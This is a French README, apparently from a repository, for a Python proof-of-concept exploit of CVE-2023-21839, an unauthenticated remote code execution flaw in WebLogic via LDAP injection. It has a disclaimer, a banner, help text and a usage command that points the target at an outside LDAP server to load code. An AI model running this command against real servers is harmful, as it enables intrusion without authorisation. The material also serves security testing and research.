
Preuve de concept Python pour l'exploitation de CVE-2023-21839 ciblant les serveurs WebLogic via une injection LDAP pour une exécution de code à distance non authentifiée.
Selon les besoins spécifiques, j'ai traduit la version GO de @4ra1n en Python, encore merci !
Ce programme doit être utilisé uniquement à des fins de tests de sécurité et de recherche autorisées. L'utilisateur doit se conformer à la loi sur la cybersécurité.
Toute activité illégale, telle que des attaques non autorisées, effectuée avec cet outil n'engage pas la responsabilité de l'auteur.
Reproduction avec vulhub : lien
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
